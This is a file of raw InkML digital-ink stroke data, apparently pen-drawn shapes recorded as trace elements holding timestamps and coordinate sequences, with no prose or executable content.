  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="64531.08">20002 5755 0,'0'0'0,"-26"0"31,-27 0-15,40 0-16,-27 0 16,-92 0-1,66-14-15,-278-12 16,-132 13 0,370 13-16,-27 0 0,-131 0 15,145 39-15,-265 67 16,67-66-1,224-27 1,-158-13-16,158 0 16,27 0-16,-66 0 0,79 0 15,-80 0 1,107 0-16,0 0 0,-41 0 16,41 0-16,-106 27 15,26-1 1,13-13-1,-13-13 1,67 0 0,-1 14-1,27-14-15,-80 13 16,1-13 0,-14 13-1,0 13 1,26-12-1,-12-1 1,92 0 15,-27 0 32,-12 80-48,39-67-15,-40 80 16,40-13-16,-13 105 16,13-105-1,0-67-15,0-12 0,0 25 16,0-25-16,13 25 16,-13-12-16,13-1 15,1 27 1,-1-40-1,13 40 1,40 13 0,-52-52-1,-1-1-15,-13 0 0,26 27 32,-26-27-32,13 27 15,1 79 1,12-13-1,1-1 1,-14-52 0,-13 13-1,40 54 1,-14-54 0,-13-27-1,14-12 1,-27-14-16,0 0 31,26 0-31,-26 1 31,0-1-31,13 13 16,146-26 0,-66 0-16,-1 0 0,14 0 15,93 0 1,-173-13-16,93-13 15,-66 26 1,-40 0-16,1 0 16,25 0-1,-26 0-15,40-14 16,0 1 0,-26 13-16,-1 0 15,1 0-15,-14 0 0,185 0 16,-171 0-1,-14 0 1,0 0 0,0 0-1,40 0 1,-39 0-16,12 0 0,14 0 16,224-13-1,-52-40 1,-27 0-1,-158 40-15,145-27 16,79 1 0,-198 12-16,92-13 15,80-26 1,-106 27 0,40-28-1,-132 54-15,12 0 16,80-27-16,252-26 31,-160 0-31,-131 13 31,-54-79-31,1-53 32,26 52-17,-14 54 1,14 0-1,-53 52-15,27-13 16,-27 1 0,0-54-1,0 1 1,0-14 0,0-13-1,0 79-15,-53-53 16,-27 27-1,-25-13 1,-1 26 0,79 53 15,-12-13-15,25-1-16,-25 1 15,-133-13 1,39-14-1,120 40 1,0 0 0,0 0 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="66196.62">17013 8017 0,'0'92'140,"0"-12"-124,0-67-16,0 14 16,0-1-1,0 0 16,0 41 110,0-41-125,0 14-1,0-1 1,0 1 0,0-27-1,0 14 1,0-14-1,0 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="69440.2">8123 9353 0,'92'13'63,"437"53"-48,-105-52 1,-120-1 0,-119-13-1,-132 0 1,13 0 0,27-13-1,-67-1-15,120-12 16,26-27-1,26 40 1,-12-27 0,-1 14 15,13-1-15,1 1-1,-14 13 1,-66-1-1,-26 14 1,-80 0-16,13 0 0,54 0 16,25 0-1,-65 0-15,106 0 16,52-26 0,-171 26-16,52 0 15,-53 0 1,14 0 31,119 0-16,-53 0-15,-53 0-1,-40 0 1,79 0-1,-65 0-15,39 0 0,106-13 16,-79-1-16,39-25 16,-66 12-1,-66 14 1,26 0 0,-12-14-16,25-12 15,67-67 1,-26 53-1,-41 40 1,-26-14 0,40-26 15,-39 53-31,12-26 16,1 13-16,-14-1 0,13 14 0,14-26 15,79-14 1,-93 27-1,-12 13 1,-1 0 0,40 0-1,53 0 1,-14-27 0,-65 14-16,52 13 15,0 0 1,-65 0-16,12-13 15,-13 13 1,54 0 0,12 0-1,-53 0-15,1 0 0,13 0 16,12 0 0,-38 0-16,-1 0 15,40 0 1,13 13-1,40 27 1,-67-27 0,-12-13-1,-14 0 1,14 0 0,-14 0-16,-13 13 15,13 1-15,53 25 31,-26-25-31,-14-1 16,-12 0 0,12 13 15,1 41-15,-14-54-16,13 27 15,-13-27 1,1 13-1,-14 1 1,0 39 0,0 13-1,13-79-15,-13 27 16,13-1 0,-13 1-1,0 12 1,0-12-16,-26-1 15,12 1 1,1-14 0,13 0-1,-13 0 1,-27 1 0,27-1-16,-66 26 15,-14 28 1,0-1-1,41-13 1,12-40 0,13-13-1,-12 13 1,-27 0 0,52-13-16,-25 0 15,-41 40 1,27-40-1,-26 0 1,13 13 0,-40-13 15,93 0-31,-14 0 0,1 0 16,-27 0-1,-26 0 1,-1 0-1,41 0-15,-1-26 16,-13 13 0,40 13-16,-1-14 0,-12 1 15,0 0 1,-27-14 0,26 27-1,14 0-15,0-26 16,-14 13-1,1 0 1,-14-1 15,-13-25-31,0-1 32,14 13-17,39 14 1,-14 13-16,14-13 0,-13 0 15,13 0-15,-13-40 16,-40-53 0,27 66-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="71514.92">17092 8453 0,'0'0'16,"0"-13"15,-53-13-16,13 13-15,-79-14 16,-145-39 0,-27 13-1,119 53 1,106 0-16,13 0 0,-40 0 16,-105 0-1,-1 0 16,27 0-15,133 0-16,-133 0 16,13 13-1,119-13-15,-132 27 32,146-27-32,13 13 0,-67 0 15,40-13-15,-12 13 16,-1-13-1,39 14 1,-39-1 0,27-13-16,-27 26 15,0-12 1,27-14 0,-1 13-1,1 13 1,-27 1 15,40-14-31,-93 53 16,66-26-1,14-14 17,-14 14-17,0 13 1,40-27-16,-26 14 15,-14 13 1,40-40-16,0 14 16,-26-1-1,-1 14 1,1 26 0,26-53-16,-13 27 15,-1-40-15,-25 79 16,39-13-1,-14-39 1,14 39-16,0 13 16,0 1 15,0-67-31,0 13 16,0 14-1,0-14 1,27 27-1,-14-13 1,14 13 0,-1-27-1,53 27 1,-12-13 0,25 13-1,1-13 1,-27-27-1,-53-13-15,40 26 16,-40-26 0,0 0-16,40 0 0,40 14 31,-14-14-15,54 13-1,-94-13-15,80 13 16,40-13-1,-27-26 1,67 12 0,13-39-1,184-39 1,-184 26 0,132-40 15,-225 66-31,0-13 31,-39 14-15,-27-1 15,-27 27-31,14-14 16,26-13-1,0-12 1,-13 12-1,0 13 1,13-25 0,-26 38-1,-1-12 1,-12-27 0,12 13-1,-12-39 1,-1-1-1,-26 67-15,0-13 16,14-14-16,-14-79 16,0 26 15,0 14-15,-27 39-16,1 14 0,-27-27 15,-66-26 1,79 52-16,-39-13 15,52 40-15,14 0 16,-27 0 0,14 0-1,13 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="73405.92">15015 9975 0,'0'92'125,"0"80"-94,0-145-31,0-1 0,0 1 16,0-14-16,0 13 16,0 27-1,0-39-15,0 12 16,0 14-1,0-27 1,0 0 0,0 0-1,0 1 32,13 12-31,1 1 93,-14-14-93,0 13-16,0-13 15,0 1 1,0-1 31,0 13-31,0 1 30,0-14-14,13 0-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="75654.97">13428 11020 0,'-27'0'31,"-145"0"0,106 0-15,-27 0 0,-26 0-1,106 0 1,-13 0-16,-1 0 0,14 0 0,-13 0 16,-27 0-16,-80 0 15,120 0-15,-13 0 16,-14 0-16,-132 0 31,106 0-31,0 0 16,52 0-1,-25 0 1,12 0 0,14 0-16,-27 0 15,-26 26 1,0 14-1,26 0 1,1-1 0,-1 1-1,40-27-15,-13 14 0,0-27 16,-1 13-16,-12 13 16,13 1-1,-14-1 16,27-12-31,-40 105 32,40-93-32,-13 1 0,13-14 0,-13 66 15,0-39 17,0-14-17,13 14 1,0 0-1,0-14-15,0 1 16,0 12 0,0-25-1,0-1 1,0 26 0,26 28-1,-26-54-15,26 13 16,-26 1 15,80 65-15,-27-25 15,-40-54-31,13 0 16,1 27-1,66-1 1,-54-25-1,27 12 1,-39-26-16,-14 0 0,40 13 16,92 14-1,-118-27-15,26 0 0,0 0 16,13 0 0,-13 0-1,53 0 16,-93 0-31,66 0 0,27-40 16,-66 27 0,26-14 15,-26-26-15,39-13-1,-79 40-15,66-14 16,-26-13-1,-27 40-15,0 0 0,1-27 16,25-53 0,-26 67-16,1-40 15,-1 0 1,-13 52-16,0-12 0,13 0 16,0 12-16,-13-12 15,0-27 1,0 13-1,0-39 1,0-27 15,14 80-15,-14 12-16,0-12 16,0-14-1,-40 14 1,27 13-1,-14-1 1,-12-12 0,25 13-16,-39-14 15,27 14-15,-40 0 16,39-14 0,1 27-1,-1 0 1,-12 0-1,-14 0 1,40 0 0,-67 0-16,41 0 31,25 0-15,1 0 93,0 0-93,0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8:51:52.0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7951 4591 0,'-27'-14'47,"1"14"-31,-106 0-1,-160 27 1,-65 39 0,-106-53 15,318 0-31,-226 1 16,-65-1-1,277 13 1,53-13-1,-39 14 1,-41-1 0,134-12-16,-134 12 15,-39-13 1,173-13-16,-134 40 16,14-27-1,119 0-15,-79 1 16,79-14-16,-92 13 15,-67-13 1,146 0 0,13 0-16,-13 0 0,26 0 0,-224 26 31,118-26-15,27 0-1,106 0-15,-53 0 16,52 0-16,-65 0 15,53 0-15,-107 0 16,-92-39 0,93 25-1,26-12 1,93 26-16,-53-13 16,-40-27-1,0 0 1,27 1-1,66 39 17,-1-14-1,-65-105 16,26 40-32,-26-53 1,65 66 0,1 39-1,13-13 1,0 27-16,0-26 16,0-28-1,13-38 1,54 12 15,-1-13-31,40-39 16,-1 39 15,1 26-15,-79 67-16,-1-13 0,14-1 0,66-12 15,39-14 1,-79 26-16,146-39 15,26 13 1,-159 40-16,160-40 16,-54 53-1,40 0 1,-80 0 0,160 13-1,78 67 1,-171-1-1,-120-39 1,-78-27 0,12 0-16,27-13 15,26 0 17,-52 0-32,39 0 15,27 0 1,-67 0-16,53 0 0,107 27 15,-28-1 1,-144-26-16,-1 0 0,53 0 16,80 0-1,-41 0 1,107 0 0,26 0-1,-185 0-15,93 0 16,-14 0-1,-40-13 1,-12-14 0,-54 14-1,54 0 1,-54 13-16,27 0 16,0 0-1,-27 0-15,1 0 16,66 0-1,-80 0-15,13 0 0,14 0 16,185 0 0,-159 0-16,-26 13 0,26 0 15,40 67 1,-93-80-16,0 13 0,14 13 16,-14-12-16,26 25 15,-39-25-15,14-1 16,-14 26-16,39 41 15,-25-54-15,-1 1 16,0 12-16,-13-12 0,13 13 16,-13 39 15,0 14-15,0-67-1,0-13 1,-13 1 15,-66 38-15,26 1-1,-27 13 1,27-26 0,40 0-1,0-40-15,0 0 16,13 26-16,-40 27 15,-26 13 1,53-39 0,-27 26-16,14-40 31,12 0-31,14 0 0,-13 1 31,13-1-15,-13-13 109</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1337.13">21907 5173 0,'0'-40'47,"-132"-39"-32,79 52 1,14 27-16,-147-40 16,133 27-16,-105 0 15,-67-14 1,185 14 0,-79 13-16,79 0 0,-39 0 15,13 0 1,39 0-1,14 0 1,-13 0 0,-1 0-1,-12 0 17,25 0-17,1-13 126,0 0-126,-93 13 1,80 0 0,12 0-16,1 0 0,-13 0 15,-1 0 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2136.88">19116 4882 0,'-13'-14'15,"0"14"-15,-1 0 0,1 0 0,-132 0 16,79 0 0,-14 14-16,40-1 15,-330 40 1,317-53-16,-39 0 16,-27 0-1,105 0-15,-25 0 16,-41 0-1,-39 26 1,53-13 0,26 1-16,-13-1 15,-66-13 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3672.95">21683 7276 0,'-14'0'31,"-197"0"0,184 0-15,1 0-16,13 0 15,-54 0 17,1 0-17,-26 0 1,-14 0-1,93 0-15,-14 0 16,-13 0-16,27 0 0,-26-13 16,-67 0-16,13-14 15,-13 14 17,93 13-32,-13 0 78,12-13-78</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4340.67">19010 7250 0,'-26'0'31,"-80"0"-15,80 0-16,-27 0 15,-53 0 1,79 0-16,-118 13 15,52-13-15,-66 0 16,146 0-16,-53 0 16,13 0-1,40 0 1,-27 0-16,-13 0 16,27 0-16,-53 0 15,12 0 1,54 0-16,-13 0 15,-1 0 79</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5416.74">5120 4445 0,'53'0'93,"-27"0"-93,-13 0 0,225 0 32,-145 0-32,158 13 0,-158 0 15,145 27-15,-92-27 0,-14 14 16,265-14-1,-305-13-15,120 0 16,-53 0 0,-133 0-16,1 0 15,-14 0 1,66 0 0,-39 0 15,-27 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6933.27">6800 6959 0,'0'0'0,"-93"145"32,67-118-32,-80 39 15,-265 0 1,279-53-16,-40-13 15,-146 0 1,26 0 0,28 0-1,157 0-15,-144 0 16,-239 40 0,357-27-16,-52 0 15,79 0-15,13-13 0,-13 14 16,-186-14-1,213 0 1,-54 0-16,40 0 0,0 0 16,-13 0-16,0-14 0,-27 1 0,14 0 15,-14 0-15,-476-40 32,450 53-32,66-13 0,-66-14 15,80 27-15,12 0 16,1-13-16,-54 13 15,14-27 1,40 14 0,13 13-1,-54-26 1,-38-14 0,78 40-1,14 0-15,0 0 0,-14 0 0,-26-13 16,40 0-16,-13-1 15,26 1 79,0-13-78,0-1-16,0 1 0,13-14 15,13 40 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8531.01">17052 7064 0,'-13'-13'47,"13"0"-16,-145 0 16,118 13-47,-158 0 15,13 0 1,132 0-16,-26 0 16,13 0-1,27 0 1,13 0-16,-27 0 16,-40 0-1,67 0-15,-13 0 16,-14 26-1,-13-13 1,-13 27 0,40-40-16,-41 27 15,28-27 17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8:52:04.5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22450 3929 0,'0'0'0,"-53"0"0,-251 0 16,198 0-1,53 0 1,0 0 0,0 0-1,-172-26 1,-66-54-1,212 67-15,-80 0 16,106 13 0,13 0-16,-26 0 0,-92 0 15,-67-13 17,-66 13-17,224 0-15,-118 0 16,-13 0-1,145 0-15,0 0 0,-26 0 16,-173 0 0,186 0-16,0 0 0,-80 0 15,-78 0 1,171 0-16,-80 0 16,-12 39-1,105-26-15,0 1 16,-39 25-16,-106 67 15,0-53 1,66 0 0,13-13-1,-53 26 17,53 0-17,-66 27 1,146-67-16,-67 27 15,27 0 1,53-53-16,0 26 16,-1-12-1,1 12-15,0 40 16,13 53 0,0-26-1,0 13 1,0-67-1,0 41 17,0-14-32,53 27 31,-40-80-15,27 13 30,185 14-30,-173-27-16,68 0 16,-15-13-1,-65 0 1,-13 27 0,-14-27-16,26 13 15,54 13 1,-80-26-16,93 27 15,265-14 17,-94-13-17,-12 13 17,66 1-17,-1-14 1,-237 0-16,185-14 15,-133-12 1,-12 13 0,-67-1-1,-40 1-15,107 0 16,-81 0-16,67-14 16,53-12-1,-39-1 1,-41 14-1,-78 26-15,105-14 32,172-52-17,-252 53 1,41-14 0,-14 1-1,-40 0 1,-26-27-1,0-40 1,0 67 0,0-54-1,14 67 1,-1-53 0,-13 53-16,0-1 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2316.77">7276 6046 0,'-13'0'0,"26"0"0,-106-27 15,80 14 1,0 13-16,-27-13 16,-264-40-1,-27-26 1,212 65-16,-159-52 15,173 66-15,12-13 0,0 0 0,1-1 16,-279-25 0,67 12-1,13 27 1,-26 0 0,26 40-1,251-40-15,-26 13 16,13-13-16,0 0 0,-199 0 15,200 0 1,-107 0-16,106 0 16,-79 0-16,79 0 15,26 0-15,-65 0 0,-107 0 32,-65 13-17,237 1-15,-105-14 16,26 26-1,13-26 1,40 0 0,40 0-16,0 0 0,-40 0 15,-53 0 1,40 13 0,0 27-1,53 0 1,0-27-16,-1-13 15,1 40-15,0-1 16,0-25 0,-1 12-16,1 0 0,-27 67 15,40-66 1,0-1 0,-26 27-1,26-13 1,0 26-1,0-53-15,13 0 0,67 106 32,-41-13-17,14 53 1,-13-67 0,0-39-1,-40-39 1,39 25 15,14 41-15,13-1-1,186 93 17,-199-146-32,0-12 15,-14-1 1,-26-13-16,1 13 15,12 14 1,67 26 0,357 92-1,-186-92 1,-185-13-16,107-1 16,-67-39-1,-80 0 1,1 0-1,26 0 1,40-26 0,-93 13-1,14-14-15,145-39 0,13-40 32,-132 14-17,-27 78-15,1-39 16,-14 40-16,0 0 0,40-53 15,13-40 1,-39 80-16,-14 12 0,53-52 16,-26 40-1,-14-1 1,14 1 0,13 13-1,-40 13-15,27 0 16,0 0-1,-14 0-15,14 0 16,13 0 0,-27 0-1,53 0-15,67 0 32,-14 0-17,-105 0 1,-14 0 15,27 0-15,-27 0-16,27 0 15,12 0 1,-38 0-16,12 0 16,40 0-1,-39 0-15,52 0 16,-66 0-16,27 0 15,53 0-15,52 0 16,-79 13 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4474.04">16999 7210 0,'-79'13'0,"158"-26"0,-317 39 16,172 1-16,-79-14 16,52 0-1,80-13-15,0 13 16,-27-13 0,13 0-1,41 14 48,290 39-48,-251-53 1,278 0 15,-278 0-15,-27-27-1,-172-65 48,-25 39-47,131 53-16,-66 0 15,-13 0 1,79 0-16,27 0 15,0 0-15,-14 0 0,-12 0 16,52 0 47,66 39-48,1-12-15,-27-14 0,79 0 16,106 27-1,-172-40 1,-53 0 15,-26 0-15,0 0-16,-27-13 0,-79 13 16,-159 0-1,239 0-15,-67 26 16,53-26-1,40 0 32,105 53-15,-52-40-32,145 1 15,-92-14 1,-80 0-16,13 0 15,-92-40 17,-185-26-17,185 66 1,53 0 46,198 79-46,-66-66 0,-119 1-1,-53-28 32,-331-65-31,331 79-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6201.16">15253 7157 0,'-26'0'78,"-40"-13"-63,-186 13 1,-317 0 0,358 0-16,-676 0 15,279 39 1,449 1-16,27-27 15,-172 27-15,-67 13 16,67-13 0,-93 26-1,-119-13 17,371-53-32,-266 53 15,-91-14 1,436-39-16,-146 27 15,106-27 1,93 0 0,0 0 15,-54 0-15,54 0-16,-40 0 15,-13 0 1,53 0-1,-27-13 32,40-1 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7102.07">8784 7501 0,'13'0'31,"-79"0"0,-159 40-15,172-27-16,-66 27 15,80-27-15,-14 0 32,79 27 124,40-1-140,-52-39-16,12 14 15,-13-14-15,27 0 16,26 0-1,-13 13 1,-27 13 15,-12 1 1,25-40 14,1-1-30,-27-12-16,53-40 16,-26 39-16,13-52 15,-40 52-15,27-52 16,0-14 0,-40 67-16,0 13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2:58:37.1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8:52:14.3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19791 7223 0,'-66'-13'47,"0"0"-31,-106 13-1,-67 0 1,200 0 0,-54 0-16,-39 0 15,-14 0 17,-12 0-17,105 0-15,-119 0 16,-27 0-1,173 0-15,-14 0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="855.1">17251 7170 0,'-106'-26'47,"-79"26"-31,66 0-16,39 0 16,-65 0-16,-80 0 15,185 0-15,-52 0 16,-41 0-1,1 0 1,66 0 0,53 0-1,-1 0-15,1 0 32,0 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2959.26">7726 7144 0,'13'13'62,"172"66"-46,-119-52-16,199 52 16,158 40-1,-357-106-15,-13 1 0,53-1 16,-53-13 0,-26 0-1,52 0 1,-53 0-16,41 0 15,105 0-15,211 0 16,-290 0-16,13 0 16,79 0-16,-119 0 0,225 0 15,-93 0 1,27 26 15,0 41-15,132 12-1,-145-66 1,-119-13-16,132 27 16,185-27-1,-132 0 1,-67 26 0,67-13-1,-27 1 1,-198-1-16,119 53 15,133 13 1,-120-26 0,13-13-1,-26-27 17,-106 0-17,-52-13-15,-1 0 16,13 0-1,27 14 1,185 65 0,0 40-1,27-26 1,-186-80-16,120 40 16,39-27-1,-145-13 1,-67 1-1,27-14 17,39 26-1,-65-13-15,66 1-1,-1 25 1,1 1-1,-40-40-15,0 13 0,13-13 16,-53 0 0,0 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5981.17">5702 9472 0,'26'0'62,"80"0"-46,-93 0-16,106 0 15,199 13 1,-252-13-16,172 0 16,-39 0-1,-1 0 1,27 0-1,-172 0-15,119 0 16,0 0 15,-133 0-31,133 0 32,-53 0-17,-92 0-15,13 0 0,105 0 16,-105 0-16,52 0 15,133 0 1,-172 0-16,172 0 16,13-13-1,-198 13 1,13 0 0,-40 0-16,14 0 0,12 0 15,67 27 1,-79-27-16,52 26 15,172 40 17,-198-53-17,185 40 1,14-26 0,-41-1-1,-52 1 1,0-27-1,13 0 1,53 0 0,26 0-1,-79 0 1,-132 0-16,-14 0 0,54 0 16,25 0-1,-12 0 1,79-53-1,-53 0 1,-79 26 0,-14 27-16,40-26 0,27-1 31,-80 14-31,40 13 16,13-39-1,-39 39-15,39-27 16,40 1-1,132 12 1,-172 14-16,-40-13 0,1 13 16,39-13-1,66-14 1,93-25 0,-185 38-16,-14 1 0,14 0 15,-27 13 1,0 0 15,27-13 125,-27 13-140,14 13 31,-1 0-32,-12 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8:54:23.5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14407 7818 0,'-53'0'31,"-238"106"-15,198-79-16,-277 79 15,237-93-15,-303 66 16,303-39-16,-171 26 15,106 53 1,171 0 15,1 199-15,26-279-16,-27 147 16,14 52 15,66-66-16,119-67 1,146 28 0,-14-14-1,-251-93-15,79 1 16,146-14 0,-133-13-1,-52 0-15,476 0 31,-516 0-31,158 0 47,-105-93-31,53-171 15,-133 118 0,-26 107-31,0-41 16,0-52 0,67 26-1,-15 0 1,-25 67 0,-27 12-1,0-13 1,-13-13-1,13 27 17,-27-14-17,-105-13 1,-265-39 0,331 65-1,-80 1-15,-105-1 31,39 27-15,27 0 0,106 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="966.29">7223 9247 0,'13'0'47,"239"80"-31,-160-54-16,54 0 0,357 14 15,290-27 1,-65-13-1,-53 0 1,-543 0-16,185 0 16,-237 0-16,92 0 15,0-13 1,-40-27 0,106-12 15,66 12-16,-39 13 1,-239 27-16,1 0 0,-1 0 16,-12 0-1,-1 0 17,53 0-17,-40 0-15,54 0 16,12 0-1,-65 0-15,13 0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3613.68">7289 11311 0,'13'13'31,"14"0"16,198 40-31,211-26-1,-12-14 1,-27-13 0,-40 0 15,-278 0-31,106 0 15,-118 0-15,-28 0 0,107 0 16,92-13 0,-13 13-1,-14 0 1,-25 0 0,-147 0-16,80 0 15,-79 0-15,26 0 16,27 0-1,-67 0-15,14 0 16,0 0-16,65 0 0,67 0 16,-39 0-1,-80 0 1,-40 0 0,13 0 15,54 0-16,184 0 1,-39-13 0,-66-27-1,-66 0 1,-80 40 0,13-26-1,14 12 1,26-12-1,-13 0 1,-27-1 0,-12 27-1,-14-26 1,-14-27 0,-38 26 15,38 27-31,-39 0 15,27 0-15,-40 0 16,39 0-16,-145 0 16,-66 13-1,106 54 1,-40 38 0,26-25-1,27-14 1,80-53-16,-27 14 15,13 12 1,39 1 15,1-27-15,13 1-16,0 25 16,0 14 15,0 13-16,0 27 1,0-27 0,0-53-16,0 0 15,13 1 1,-13-1-16,14 0 16,39 53-1,26 14 1,-13-41-1,-53-25-15,27-1 16,-27 0-16,0 0 16,27 1-1,-27-14-15,67 26 16,12-13 0,67-13-1,13 0 16,-159 0-31,27 0 16,39-26 0,1 13-1,65-14 1,-52 14 0,-14 0-1,-39-1 1,0-12-1,-14 13-15,53-27 16,14-13 0,-27 13-1,-39 27 1,-1-13 0,1-1 15,25-12-16,1-1 1,-13 0 0,0 14-1,-27 26-15,13-40 16,1-13 0,-14 27-16,27-27 15,-14-27 1,1 14-1,-14 27 1,-13-1 0,0-26-1,-13 26 1,-27 0 0,0-13 15,-13 14-16,40 25-15,-53-25 16,0 39 0,53 0-16,-1 0 0,-38 0 15,-1 0 1,13 0 0,0 0-1,27 0-15,-40 0 16,40 0-16,-40 0 15,-13 0 1,-14 0 0,14 0-1,13 13 1,14 0 0,25-13-1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8:54:31.59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13335 10081 0,'-40'26'47,"-26"-13"-32,0 14 1,-27-1 0,67-26-16,-53 27 15,-27-1 1,79-13-16,-65-13 16,-94 14-1,41-1 1,-1 27-1,-26-27 1,-39 13 0,158-26-16,-146 0 15,-92 13 1,146 14 0,-1-1 15,80-26-16,-79 0 1,105 0-16,-13 0 0,-79 0 16,-344-13-1,105 0 1,120 13 0,198-13-16,-53 13 15,80-14-15,-93-12 16,26 13-1,53 13-15,-52-13 16,-1 13 0,40 0-1,13 0 1,1 0 0,-41-40 15,67 40-31,-93-13 15,0-14 1,80 14 0,13 13-1,13-13 32,-66-1-31,-1 1-1,-12 0 1,0 0 0,-1 0-1,-26-27 1,-39 13 0,92 14-1,40 0 48,-40 0-48,13-14 1,14 14 0,13 13 30,-80-132-30,53 26 0,27 0-1,0 27 1,13-14 0,0 67-16,0-14 31,0-39-16,0 39 1,0 13 0,0 14-1,26-40 1,1 40-16,65-27 16,80-39-1,-145 79-15,26-26 16,-14 12-1,14 1 1,80-27 0,-67 40-16,172-26 15,-40-1 1,-118 27 0,-1 0 15,53 0-16,93 0 1,-159 14-16,199 65 16,158 14-1,-211-67 1,-80-13 0,-66 1-1,40-1 1,-79 0-16,118 14 15,159 12 1,-39-12 0,-93 12-1,-53-39 1,-79 0 0,-27 0-1,27 0-15,39 0 31,14 0-15,-27 0 0,-13 0-1,-14 0 1,-12 0-16,26-13 16,106-13-1,13-14 1,-80 0-1,-65 40 1,-14 0 31,26-13-31,-12 13-1,-1 0 141,14 0-140,-27 0-16,14 79 16,-14-52-1,-13-1 1,26 1-16,-26 39 16,0 13 15,0-65-31,0 25 15,0 14 1,0 13 0,0-26-1,0-27-15,0 14 16,0 39 0,0-53-16,0 27 15,0-14 1,0 14-1,0-27 1,0 0-16,0 1 31,0 12 47,0-13-62,0 14-16,0-1 16,0 14-1,0-27 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6869.33">22397 6575 0,'-40'0'31,"-238"-27"-15,80 27 0,13 0-1,39 0 16,-12 0-15,105 0-16,-80 0 16,-78 0-1,131 0 1,14 0 0,40 0-16,-67 0 15,-39 14 1,105-14-16,-65 0 15,52 0 1,27 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9434.84">14883 6906 0,'-13'0'0,"26"0"0,-119-67 31,13 1-15,-12 40 0,-1-14-1,-119 0 1,145 27-16,14-13 16,-92-27-1,118 40-15,-370-53 47,-821 39 78,1218 27-109,-13 0-16,13 0 0,-54 0 15,54 0-15,-13 13 0,-27 1 16,-106 12 0,133-13-16,-1-13 15,-26 0-15,13 13 0,14-13 16,13 0-16,-14 0 0,-39 14 15,40-1-15,26 0 0,-53 0 16,-27 27 0,1-14-1,66-12-15,-53 12 16,-27 1 0,67-14-1,-14 13-15,13-12 31,-12-1 1,12 13-17,27-13-15,-26 14 16,-1-14 0,27 0-1,0 14 1,0 26-1,0 0 1,0-27-16,0 27 16,0 13-1,0-39-15,27 52 16,-27 27 0,26-14-1,-26 67 16,0-79-15,14-41 0,25 27-1,1 1 1,0-1 0,-14-13-1,-13-40-15,27 40 16,39 66-1,-12-79 1,38-14 0,28-26-1,12 0 1,-118 0-16,118-53 16,133-53 15,-212 93-31,212-27 15,-93-13 1,-79 27 0,0 13-1,-80 13-15,-13-14 0,54 14 16,-41 0-16,93-13 16,159-26-1,-212 39-15,106-40 16,-26 27-1,-93-14 1,-27 14 0,53-13-1,1-1 1,-67 14 0,40-14-16,-13-12 31,-27 39-31,13-53 15,40-27 1,-13 14 0,-13 27-1,-40 25-15,13 1 16,-13 0-16,13 0 16,1-1-1,-14-12 1,13 13-1,0-14 1,0-26 0,-13 40-16,0-27 15,0-79 1,0 53 0,-26 13 15,13 14-16,-14 12 1,14 14-16,0 0 16,-14-1-1,14 14 1,-13-26 0,-1 26-1,-13-26 1,27 26-16,-13-14 15,13 14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8:55:07.1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7792 4749 0,'-13'0'16,"26"0"-16,-39 0 15,-94 0 1,54 0 0,-264 0-16,-147 0 15,54 0 16,-14 0-15,120 0 0,264 0-16,-145 0 15,-318 13 1,145 27 0,-52 13-1,52-13 1,120-40-1,198 0-15,-79 0 16,13 0 0,-53 0-1,-27-13 1,-25-27 0,38 13-1,133 27 1,-52-13-16,-54-27 31,119 27-31,-79-13 16,-13-1-1,13 1 1,53 26 0,52 0-16,1 0 15,13-13 95</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1794.35">5953 6906 0,'-106'0'16,"-344"13"-1,199 0 1,-53 27-1,-159-40 1,106 0 0,224-13-16,-250-14 15,264-13-15,-186 14 32,107 26-17,119 13 1,-67-13 15,106 0-31,-79 0 16,40 0-1,66 0 1,-27 0 31,-39 40-32,52-40-15,-26 13 16,0 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3042.8">16960 6919 0,'-66'0'94,"-239"53"-79,107-14 1,-1-12-1,160-27-15,-107 0 16,-132 0 0,67 0-1,92 0 1,26 26 0,40-26-1,27 0 1,26 14-16,-27-14 62</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5239.83">6482 10332 0,'-79'0'31,"-225"-53"-15,-93 40 0,-53 13-1,344 0-15,-238-13 16,238-14-16,14 14 0,-133 13 15,-410-79 1,132 12 0,-13 14-1,40 53 1,26 0 0,384 0-1,-159 0-15,159 0 16,-93 0-1,0 0 1,133 0-16,-27 14 16,27-1-16,12-13 15,-12 0 1,-40 0 0,53 0 109</inkml:trace>
